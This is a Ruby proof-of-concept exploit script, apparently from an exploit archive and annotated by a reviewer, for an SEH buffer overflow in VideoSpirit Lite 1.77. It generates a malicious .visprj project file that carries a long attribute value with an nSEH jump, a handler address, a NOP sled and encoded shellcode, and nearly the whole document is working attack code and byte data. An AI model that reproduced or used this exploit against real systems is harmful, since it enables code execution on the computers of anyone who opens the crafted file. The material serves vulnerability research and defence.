VideoSpirit Lite 1.77 SEH Buffer Overflow (proof-of-concept exploit, .visprj file format)
Posted on 13 November 2013
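#!/usr/bin/ruby
# encoding: ASCII-8BIT
#
# VideoSpirit Lite 1.77 - SEH buffer overflow via a crafted .visprj project file
#
# Vendor:         http://www.verytools.com/
# Software link:  http://www.verytools.com/videospirit/download.html
# Date found:     11.11.2013
# Exploit author: metacom
# Tested on:      Win7 / Win8 (EN)
#
# Running this script writes Exploit.visprj to the current directory. The
# file is a VideoSpirit project whose <type1> block carries an oversized
# `<valitem name="mp3" value="...">` attribute; per the original PoC the
# value overruns a stack buffer and overwrites the SEH record at +104.
#
# NOTE(review): the "encoding" comment on line 2 is required on Ruby 1.9+.
# Without it every "\x.." literal below takes the UTF-8 source encoding and
# holds invalid byte sequences; with it (and the explicit .b calls) the
# payload is assembled as plain bytes and written verbatim with mode "wb".
# The escape sequences in the corpus copy had lost their backslashes
# ("x41" instead of "\x41"), which would silently break every offset below;
# they are restored here.

# Output file name used by the script entry point.
OUTPUT_FILE = "Exploit.visprj"

# Bytes the attribute value must not contain (taken from the PoC's own
# "Bad Characters" note). They are consistent with an XML attribute
# context: NUL, CR/LF, SUB, and the `!`, `"`, `&` characters that would
# terminate or entity-escape the value — presumably why the encoder was
# told to avoid them; verify against the parser before changing the payload.
BAD_CHARS = "\x00\x0a\x0d\x1a\x21\x22\x26".b

# Bytes of filler before the SEH record is reached (offset from the start
# of the attribute value; nSEH at +104, handler at +108).
SEH_OFFSET = 104

# Written over nSEH: `jmp short +0x0c` (EB 0C) followed by two bytes of
# padding. The jump lands 12 bytes past the end of the nSEH field, i.e. over
# the handler address and into the NOP sled that follows it.
NSEH_JUMP = "\xeb\x0c\xff\xff".b

# Address written over the SEH handler. The PoC does not name the module it
# comes from; for an SEH overwrite this is normally a POP/POP/RET gadget in
# a non-SafeSEH, non-ASLR image — confirm (e.g. with mona's !safeseh) before
# reusing on another build.
SEH_HANDLER = 0x1008667f

# Size of the NOP sled between the handler address and the shellcode.
SLED_SIZE = 80

# Trailing padding after the shellcode (INT3 bytes). Keeps the attribute
# long enough to trigger the overflow regardless of payload length.
TAIL_SIZE = 4500

# Payload from the original PoC. What it does once decoded is not recorded
# on the page; the leading bytes (mov eax; fxch; fnstenv [esp-0xc]; pop edx;
# xor ecx,ecx; mov cl,0x33) look like the GetPC stub of msfvenom's
# shikata_ga_nai encoder — treat it as opaque and run only in a sandbox.
SHELLCODE = [
  "\xb8\xb8\xd3\x62\x62\xd9\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1",
  "\x33\x83\xea\xfc\x31\x42\x0e\x03\xfa\xdd\x80\x97\x06\x09\xcd",
  "\x58\xf6\xca\xae\xd1\x13\xfb\xfc\x86\x50\xae\x30\xcc\x34\x43",
  "\xba\x80\xac\xd0\xce\x0c\xc3\x51\x64\x6b\xea\x62\x48\xb3\xa0",
  "\xa1\xca\x4f\xba\xf5\x2c\x71\x75\x08\x2c\xb6\x6b\xe3\x7c\x6f",
  "\xe0\x56\x91\x04\xb4\x6a\x90\xca\xb3\xd3\xea\x6f\x03\xa7\x40",
  "\x71\x53\x18\xde\x39\x4b\x12\xb8\x99\x6a\xf7\xda\xe6\x25\x7c",
  "\x28\x9c\xb4\x54\x60\x5d\x87\x98\x2f\x60\x28\x15\x31\xa4\x8e",
  "\xc6\x44\xde\xed\x7b\x5f\x25\x8c\xa7\xea\xb8\x36\x23\x4c\x19",
  "\xc7\xe0\x0b\xea\xcb\x4d\x5f\xb4\xcf\x50\x8c\xce\xeb\xd9\x33",
  "\x01\x7a\x99\x17\x85\x27\x79\x39\x9c\x8d\x2c\x46\xfe\x69\x90",
  "\xe2\x74\x9b\xc5\x95\xd6\xf1\x18\x17\x6d\xbc\x1b\x27\x6e\xee",
  "\x73\x16\xe5\x61\x03\xa7\x2c\xc6\xfb\xed\x6d\x6e\x94\xab\xe7",
  "\x33\xf9\x4b\xd2\x77\x04\xc8\xd7\x07\xf3\xd0\x9d\x02\xbf\x56",
  "\x4d\x7e\xd0\x32\x71\x2d\xd1\x16\x12\xb0\x41\xfa\xfb\x57\xe2",
  "\x99\x03",
].join.b

# Banner printed when the script is run directly.
BANNER = <<EOS

VideoSpirit Lite 1.77 Seh Buffer Overflow
Version: Lite 1.77
Date found: 11.11.2013
Exploit Author: metacom
Tested on: Win7-Win8-EN
EOS

# Project XML that precedes the overflowing attribute value. Decoded, it is
# (newlines are \x0A, indentation is spaces):
#   <version value="3" />
#   <track> <type value="0|4|2|1|7" /> ... </track>
#   <track0 /> ... <track4 />  <clip />
#   <output typename="AVI" keepaspect="0" presetquality="0">
#     <type0 enable="1"> four <valitem .../> entries </type0>
#     <type1 enable="1">
#       <valitem name="mp3" value="        <- ends inside the open quote
#
# @return [String] binary string, exact bytes of the original PoC.
def project_head
  [
    "\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20",
    "\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70",
    "\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20",
    "\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A",
    "\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22",
    "\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65",
    "\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76",
    "\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B",
    "\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B",
    "\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72",
    "\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A",
    "\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79",
    "\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73",
    "\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C",
    "\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30",
    "\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20",
    "\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73",
    "\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D",
    "\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20",
    "\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A",
    "\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32",
    "\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C",
    "\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76",
    "\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20",
    "\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36",
    "\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B",
    "\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20",
    "\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31",
    "\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D",
    "\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22",
  ].join.b
end

# Project XML that follows the overflowing attribute value: it closes the
# quote (`" />`), adds the remaining <type1> valitems (128k, 44100,
# "2 (Stereo)"), closes </type1>, adds `<type2 enable="0" />` and </output>.
#
# @return [String] binary string, exact bytes of the original PoC.
def project_footer
  [
    "\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65",
    "\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D",
    "\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76",
    "\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20",
    "\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20",
    "\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22",
    "\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32",
    "\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20",
    "\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20",
    "\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E",
  ].join.b
end

# The attribute value that overflows the buffer. Layout (offsets from the
# start of the value):
#   +0     "A" * SEH_OFFSET       filler up to the SEH record
#   +104   NSEH_JUMP              jmp short over the handler
#   +108   SEH_HANDLER (LE dword) address the dispatcher returns into
#   +112   NOP sled (SLED_SIZE)   jump target
#   +192   SHELLCODE
#   then   "\xCC" * TAIL_SIZE     INT3 padding
#
# @return [String] binary string
def overflow_buffer
  buf = "\x41".b * SEH_OFFSET
  buf << NSEH_JUMP
  buf << [SEH_HANDLER].pack('V')   # little-endian, as the x86 SEH record expects
  buf << "\x90".b * SLED_SIZE
  buf << SHELLCODE
  buf << "\xCC".b * TAIL_SIZE
  buf
end

# Complete .visprj contents: XML head, overflow value, XML footer.
#
# @return [String] binary string
def build_visprj
  project_head + overflow_buffer + project_footer
end

# Write the crafted project file.
#
# @param path [String] destination file name
# @raise [SystemCallError, IOError] propagated from File.open / write; the
#   block form of File.open closes the handle on both paths.
def write_exploit(path = OUTPUT_FILE)
  File.open(path, "wb") { |f| f.write(build_visprj) }
end

if __FILE__ == $0
  print BANNER
  sleep(3)
  puts "\n[+] Creating exploit file..."
  sleep(1)
  begin
    write_exploit(OUTPUT_FILE)
    puts "[+] File #{OUTPUT_FILE} created successfully."
  rescue => e
    # Report the failure and exit non-zero; the original exited 0 here,
    # which made a failed write look like success to any calling script.
    puts "**[-] Error: #{e}"
    exit(1)
  end
end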
